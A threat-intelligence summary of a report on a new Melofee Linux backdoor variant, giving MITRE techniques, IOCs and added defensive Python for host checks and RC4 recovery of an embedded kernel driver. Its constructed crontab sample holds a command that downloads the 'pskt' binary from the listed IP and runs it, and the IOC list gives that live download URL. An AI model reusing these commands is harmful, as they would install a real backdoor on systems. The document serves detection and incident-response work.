Keypoints
- ELF sample named “pskt” was retrieved from IP address 45.92.156.166.
- Identified as a new Melofee backdoor variant targeting RHEL 7.9 systems.
- Embeds an RC4-encrypted kernel driver that is decrypted and loaded on the host to hide the backdoor's activity.
- Command-and-control domain filemanage.micrsofts-file.com appears to be misattributed.
- IP 91.195.240.123 was flagged as malicious but is likely a false positive.
- Melofee runs in distinct Infection and Management modes with different functions.
- Stealth features include hiding network traffic and disguising processes.
MITRE Techniques
- [T1071] Application Layer Protocol – Uses multiple command-and-control domains to keep communicating with compromised hosts.
- [T1053.003] Scheduled Task/Job: Cron – Establishes persistence through a crontab entry.
- [T1036] Masquerading – Disguises process names to blend in with legitimate system processes.
- [T1014] Rootkit – Installs a kernel driver that hides processes and other malicious activity from host-level inspection.
- [T1005] Data from Local System – Collects device information and performs file management on the compromised host.
Indicators of Compromise
- [IP Address] sample source and C2 context – 45.92.156.166 (hosted the sample; download URL below), 91.195.240.123 (flagged as malicious by some sources but likely a false positive; do not block on this indicator alone)
- [Domain] command-and-control – filemanage.micrsofts-file.com (typosquat of "microsoft"; its attribution to a specific actor is disputed)
- [MD5] sample hashes – 603e38a59efcf6790f2b4593edb9faf5, 839f60efee25f07df7b23ba9d6bef892
- [URL] sample retrieval – http://45.92.156.166/klove/pskt (download path for the pskt ELF)
- [File name] binary – pskt (ELF backdoor sample found on RHEL 7.9)
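The indicators above are only useful if they are turned into host checks. The following is an added example (not XLab's tooling and not code from the Melofee sample) of the four checks a responder would run on a suspected RHEL 7.9 host: match file hashes against the listed MD5s, scan crontab text for the listed network indicators and the pskt/klove names, flag processes whose claimed name does not match their executable (the process-name disguise described above), and diff the PIDs visible by directory listing against PIDs that still answer a direct probe (a rootkit hiding processes from readdir). All inputs are constructed for the demo; on a live host they would come from `/proc`, `crontab -l` and `/var/spool/cron`. The 91.195.240.123 address is deliberately left out of the network set because the page calls it a likely false positive.

```python
"""Host checks for the Melofee "pskt" indicators. Added example, not from the original page.
All sample data below is constructed; collection on a real host is described in comments."""
import hashlib
import os
import re

# Indicators from the report. The 91.195.240.123 address is excluded (likely false positive).
IOC_MD5 = {"603e38a59efcf6790f2b4593edb9faf5", "839f60efee25f07df7b23ba9d6bef892"}
IOC_NET = {"45.92.156.166", "filemanage.micrsofts-file.com"}
IOC_NAMES = [r"\bpskt\b", r"/klove/"]


def md5_matches(data: bytes) -> bool:
    """True if the file content hashes to one of the reported sample MD5s."""
    return hashlib.md5(data).hexdigest() in IOC_MD5


def suspicious_cron_lines(crontab_text: str) -> list:
    """Return non-comment crontab lines referencing the C2 indicators or the dropper names.
    On a live host feed in `crontab -l -u <user>` output and the files under /var/spool/cron."""
    rx = re.compile("|".join([re.escape(x) for x in IOC_NET] + IOC_NAMES))
    return [ln for ln in crontab_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and rx.search(ln)]


def masquerading(procs) -> list:
    """procs: iterable of (pid, comm, exe) as read from /proc/<pid>/comm and readlink(/proc/<pid>/exe).
    The kernel sets comm to the first 15 bytes of the executable's basename, so a comm that does not
    match the exe basename means the process renamed itself (prctl/argv overwrite). A deleted exe
    (binary removed after launch) is also flagged. Interpreters and kernel threads need allowlisting."""
    flagged = []
    for pid, comm, exe in procs:
        deleted = exe.endswith(" (deleted)")
        base = os.path.basename(exe[:-len(" (deleted)")] if deleted else exe)
        if deleted or base[:15] != comm:
            flagged.append(pid)
    return flagged


def hidden_pids(listed, probed) -> list:
    """listed: PIDs seen in os.listdir('/proc'); probed: PIDs for which os.stat('/proc/<pid>') or
    os.kill(pid, 0) succeeded when iterating 1..pid_max. A PID that answers a direct probe but is
    missing from the listing is being hidden from directory enumeration, the classic rootkit tell."""
    return sorted(set(probed) - set(listed))


# ---- constructed sample inputs (not from a real host) ----
CRON_SAMPLE = """# m h dom mon dow command
0 3 * * * /usr/bin/updatedb
*/5 * * * * /usr/bin/curl -s http://45.92.156.166/klove/pskt -o /tmp/.x && /tmp/.x
@reboot /var/tmp/pskt
"""

PROC_SAMPLE = [
    (1, "systemd", "/usr/lib/systemd/systemd"),
    (4242, "kworker/u8:1", "/var/tmp/pskt"),        # renamed itself to look like a kernel thread
    (4300, "bash", "/usr/bin/bash"),
    (4311, "sshd", "/usr/sbin/sshd (deleted)"),     # running from a deleted binary
]

LISTED_PIDS = {1, 4300, 4311}           # what readdir(/proc) returned
PROBED_PIDS = {1, 4242, 4300, 4311}     # what direct /proc/<pid> probes answered


def run_all() -> dict:
    """Run the four checks over the constructed data and return the findings."""
    return {
        "hash_hit": md5_matches(b"not the real sample"),
        "cron": suspicious_cron_lines(CRON_SAMPLE),
        "masquerading": masquerading(PROC_SAMPLE),
        "hidden": hidden_pids(LISTED_PIDS, PROBED_PIDS),
    }


if __name__ == "__main__":
    for k, v in run_all().items():
        print(f"{k}: {v}")
```

The comm-versus-exe check produces false positives for interpreters (a Python daemon's comm is `python3`, its script name is not its exe) and for kernel threads, which have no exe at all; in practice seed an allowlist from a known-good host of the same build. The hidden-PID diff is the check that survives a kernel-level rootkit best, because most hide by filtering directory reads rather than blocking direct `/proc/<pid>` lookups.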
————
XLab’s CTIA discovered a previously unseen Melofee backdoor variant in an ELF binary named “pskt” targeting Red Hat Enterprise Linux 7.9. The sample was hosted at 45.92.156.166 and was initially undetected on VirusTotal, prompting a deeper technical analysis that revealed significant stealth improvements over earlier Melofee samples.
Notably, this variant carries an RC4-encrypted kernel driver that is decrypted at runtime and used to hide malicious behavior, plus mechanisms that obscure its network traffic and process names. The malware operates in separate Infection and Management modes, so the same binary can both establish a foothold and then carry out ongoing control and data collection on compromised hosts.
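Keeping the driver RC4-encrypted inside the ELF means static scanners never see a kernel module, and the analyst has to recover it before any driver-level analysis is possible. The block below is an added example, not XLab's code and not the sample's own routine: a minimal RC4 implementation, checked against the published RC4 test vector, and a helper that tries candidate keys against an embedded blob and accepts the one that yields the `\x7fELF` header. The key, the blob and the "driver" body are constructed for the demo; the page does not disclose the real key or where it is stored in pskt.

```python
"""RC4 recovery of an embedded kernel driver blob. Added example, not from the original page.
The key and blob below are constructed; the real sample's key is not disclosed on the page."""

ELF_MAGIC = b"\x7fELF"


def rc4_keystream(key: bytes):
    """Generator for the RC4 keystream: KSA followed by PRGA."""
    S = list(range(256))
    j = 0
    for i in range(256):                               # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:                                        # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def recover_driver(blob: bytes, candidate_keys):
    """Try each candidate key on the first four bytes only; decrypt fully once the ELF magic
    appears. Returns (key, plaintext) or (None, b''). Cheap enough to run over hundreds of
    strings pulled from the dropper's .rodata when the key location is unknown."""
    for key in candidate_keys:
        if key and rc4(key, blob[:4]) == ELF_MAGIC:
            return key, rc4(key, blob)
    return None, b""


# ---- constructed demo data ----
FAKE_DRIVER = ELF_MAGIC + b"\x02\x01\x01\x00" + b"\x00" * 8 + b"constructed kernel module body"
DEMO_KEY = b"demo-key"                     # assumption: not the real sample's key
ENCRYPTED_BLOB = rc4(DEMO_KEY, FAKE_DRIVER)


if __name__ == "__main__":
    key, driver = recover_driver(ENCRYPTED_BLOB, [b"wrong", b"", DEMO_KEY])
    print("key:", key, "driver starts with ELF:", driver.startswith(ELF_MAGIC))
```

Once the plaintext is recovered, `readelf -h` confirms it is an ET_REL object (a loadable kernel module) and `strings` on the `.modinfo` section gives the `vermagic` it was built for, which should line up with the RHEL 7.9 kernel the report names.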
The investigation also highlighted potential misattribution: the domain filemanage.micrsofts-file.com was tied to C2 activity but appears to have been attributed to the wrong actor, and an IP (91.195.240.123) flagged as malicious may be a false positive. XLab invites community input to refine attribution and expand technical understanding of this Melofee variant.
Read more: https://blog.xlab.qianxin.com/analysis_of_new_melofee_variant_en/